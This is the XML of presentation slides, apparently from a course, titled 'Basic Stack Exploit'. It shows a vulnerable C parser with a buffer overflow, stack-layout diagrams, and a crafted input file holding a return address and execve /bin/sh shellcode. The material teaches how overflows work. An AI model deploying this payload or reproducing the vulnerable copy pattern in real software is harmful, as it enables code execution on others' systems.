          <a:off x="5882594" y="4896481"/>
          <a:ext cx="1432247" cy="239430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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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5823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0x00000019</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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12197">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="105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6856727" y="4065901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7597199" y="1558191"/>
            <a:ext cx="337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fp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586218" y="1826843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72" name="Rectangle 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585776" y="2112228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713412" y="2411857"/>
            <a:ext cx="208512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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]</a:t>
            </a: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[25,26,27,28]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[7,6,5,4]</a:t>
            </a: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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a: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header_ok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7367292" y="17451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7365019" y="2011487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7365018" y="22337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7368613" y="26693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7366341" y="283051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7366339" y="298640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7364066" y="3116191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7366339" y="401192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7366339" y="414609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7366339" y="4301983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7366339" y="44572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4719899" y="1839880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709486" y="2146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166433" y="2415529"/>
            <a:ext cx="1648971" cy="216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0xbffff744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0xbffff740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0xbffff73c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0xbffff7d8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0xbffff6c4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639855" y="5180814"/>
            <a:ext cx="325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in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628874" y="5512186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94" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628432" y="5844611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95" name="Straight Arrow Connector 94"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7409948" y="536773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7407675" y="569683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7407674" y="602881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7639733" y="6153809"/>
            <a:ext cx="228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i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 flipH="1">
            <a:off x="7418975" y="633801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Table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485016"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="405627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560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0x0804a008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f764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195391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0x00000000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0xffff</a:t>
                      </a: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f764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41414141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0x20544547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5863438" y="6535708"/>
            <a:ext cx="145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(Unallocated)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7619801" y="4894177"/>
            <a:ext cx="44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out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 flipH="1">
            <a:off x="7389894" y="508109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31200" y="4924425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0xbffff6b4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720787" y="5231509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726823" y="5547223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716410" y="585430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727712" y="619486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0xbffff69c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715524" y="1568922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0xbffff760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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="110" name="Straight Arrow Connector 109"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364236" y="2523854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7359689" y="355083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203810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */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8132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Right Arrow 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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-83929" y="1613624"/>
            <a:ext cx="87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7104334" y="193712"/>
            <a:ext cx="2039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OVERWRITE POINT!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90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63760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic Stack Exploit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70484"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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76" name="Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203810" y="4966131"/>
            <a:ext cx="4201615" cy="14312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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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38471" y="5403990"/>
            <a:ext cx="3887992" cy="926407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GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xffAAAA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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80\x31\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xdb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\x89\xd8\x40\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xcd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\x80\xe8\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xdc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xff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xff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xff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/bin/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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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4134" y="497053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(input file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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043592"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4896481"/>
          <a:ext cx="1432247" cy="239430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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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5823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0x00000019</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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12197">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="105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6856727" y="4065901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7597199" y="1558191"/>
            <a:ext cx="337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fp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586218" y="1826843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72" name="Rectangle 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585776" y="2112228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713412" y="2411857"/>
            <a:ext cx="208512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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]</a:t>
            </a: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[25,26,27,28]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[7,6,5,4]</a:t>
            </a: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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a: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header_ok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7367292" y="17451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7365019" y="2011487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7365018" y="22337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7368613" y="26693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7366341" y="283051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7366339" y="298640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7364066" y="3116191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7366339" y="401192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7366339" y="414609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7366339" y="4301983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7366339" y="44572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4719899" y="1839880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709486" y="2146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166433" y="2415529"/>
            <a:ext cx="1648971" cy="216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0xbffff744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0xbffff740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0xbffff73c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0xbffff7d8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0xbffff6c4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639855" y="5180814"/>
            <a:ext cx="325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in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628874" y="5512186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94" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628432" y="5844611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95" name="Straight Arrow Connector 94"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7409948" y="536773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7407675" y="569683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7407674" y="602881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7639733" y="6153809"/>
            <a:ext cx="228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i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 flipH="1">
            <a:off x="7418975" y="633801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Table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822064"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="405627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560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0x0804a008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fff764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195391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0x00000000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0xff</a:t>
                      </a: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fff764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41414141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0x20544547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5863438" y="6535708"/>
            <a:ext cx="145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(Unallocated)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7619801" y="4894177"/>
            <a:ext cx="44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out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 flipH="1">
            <a:off x="7389894" y="508109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31200" y="4924425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0xbffff6b4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720787" y="5231509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726823" y="5547223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716410" y="585430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727712" y="619486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0xbffff69c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715524" y="1568922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0xbffff760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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="110" name="Straight Arrow Connector 109"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364236" y="2523854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7359689" y="355083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203810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */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8132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Right Arrow 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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-83929" y="1613624"/>
            <a:ext cx="87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7104334" y="193712"/>
            <a:ext cx="2039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OVERWRITE POINT!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240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967550"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4896481"/>
          <a:ext cx="1432247" cy="239430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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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5823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0x00000019</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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12197">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="105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6856727" y="4065901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7597199" y="1558191"/>
            <a:ext cx="337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fp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586218" y="1826843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73" name="Rectangle 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585776" y="2112228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7713412" y="2411857"/>
            <a:ext cx="208512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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]</a:t>
            </a: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[25,26,27,28]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[7,6,5,4]</a:t>
            </a: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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a: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header_ok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7367292" y="17451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7365019" y="2011487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7365018" y="22337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7368613" y="26693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7366341" y="283051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7366339" y="298640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7364066" y="3116191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7366339" y="401192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7366339" y="414609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7366339" y="4301983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7366339" y="44572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4719899" y="1839880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709486" y="2146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166433" y="2415529"/>
            <a:ext cx="1648971" cy="216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0xbffff744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0xbffff740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0xbffff73c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0xbffff7d8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0xbffff6c4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639855" y="5180814"/>
            <a:ext cx="325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in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628874" y="5512186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95" name="Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628432" y="5844611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7409948" y="536773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7407675" y="569683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>
            <a:off x="7407674" y="602881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7639733" y="6153809"/>
            <a:ext cx="228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i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H="1">
            <a:off x="7418975" y="633801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994958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="405627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560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0x0804a008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fffff764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195391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0x00000000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fffff764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41414141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0x20544547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5863438" y="6535708"/>
            <a:ext cx="145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(Unallocated)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7619801" y="4894177"/>
            <a:ext cx="44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out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 flipH="1">
            <a:off x="7389894" y="508109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4731200" y="4924425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0xbffff6b4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720787" y="5231509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726823" y="5547223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716410" y="585430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727712" y="619486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0xbffff69c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715524" y="1568922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0xbffff760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 flipH="1">
            <a:off x="7364236" y="2523854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>
            <a:off x="7359689" y="355083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63760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic Stack Exploit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889166"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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76" name="Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203810" y="4966131"/>
            <a:ext cx="4201615" cy="14312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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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38471" y="5403990"/>
            <a:ext cx="3887992" cy="926407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GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a: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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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AAAA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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80\x31\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xdb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\x89\xd8\x40\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xcd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\x80\xe8\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xdc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xff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xff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\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xff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/bin/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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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4134" y="497053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(input file)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 rot="2595560">
            <a:off x="5675316" y="1552312"/>
            <a:ext cx="689818" cy="250878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4711146" y="1235245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0xbffff764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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Right Arrow 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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-83929" y="1613624"/>
            <a:ext cx="87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104334" y="193712"/>
            <a:ext cx="2039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OVERWRITE POINT!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3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63760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic Stack Exploit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418725"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-3827423" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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76" name="Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203810" y="4966131"/>
            <a:ext cx="4201615" cy="14312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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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338471" y="5403990"/>
            <a:ext cx="3887992" cy="926407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GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a: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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xffAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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4134" y="497053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(input file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="62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51200"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4896481"/>
          <a:ext cx="1432247" cy="239430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2247"/>
              </a:tblGrid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0xbffff740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0x080485a2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0xbffff758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5823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0x00000019</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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12197">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="105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6856727" y="4065901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7597199" y="1558191"/>
            <a:ext cx="337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fp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586218" y="1826843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72" name="Rectangle 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585776" y="2112228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713412" y="2411857"/>
            <a:ext cx="208512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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]</a:t>
            </a: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[25,26,27,28]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</a:rPr>
              <a:t>.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[7,6,5,4]</a:t>
            </a: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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr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80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header_ok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7367292" y="17451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7365019" y="2011487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7365018" y="223370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7368613" y="266937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7366341" y="283051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7366339" y="298640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7364066" y="3116191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7366339" y="401192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7366339" y="414609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7366339" y="4301983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7366339" y="445727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4719899" y="1839880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709486" y="2146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639855" y="5180814"/>
            <a:ext cx="325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in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628874" y="5512186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93" name="Rectangle 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628432" y="5844611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 flipH="1">
            <a:off x="7409948" y="536773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>
            <a:off x="7407675" y="569683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7407674" y="602881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7639733" y="6153809"/>
            <a:ext cx="2287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i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7418975" y="633801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9" name="Table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025330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="405627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5608"/>
              </a:tblGrid>
              <a:tr h="72360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shellcode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31851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0x61616161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fffff764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195391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0x00000000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fffff764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41414141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0x20544547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0" marB="0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0" name="TextBox 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5863438" y="6535708"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r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7619801" y="4894177"/>
            <a:ext cx="44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</a:rPr>
              <a:t>out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill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H="1">
            <a:off x="7389894" y="508109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4731200" y="4924425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0xbffff6b4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20787" y="5231509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0xbffff6b0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726823" y="5547223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716410" y="585430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0xbffff6a8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727712" y="6194867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0xbffff69c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715524" y="1568922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0xbffff760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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Straight Arrow Connector 108"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364236" y="2523854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7359689" y="355083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4711146" y="1235245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0xbffff764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166433" y="2415529"/>
            <a:ext cx="1648971" cy="216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0xbffff744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0xbffff740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0xbffff73c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0xbffff7d8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0xbffff6c4</a:t>
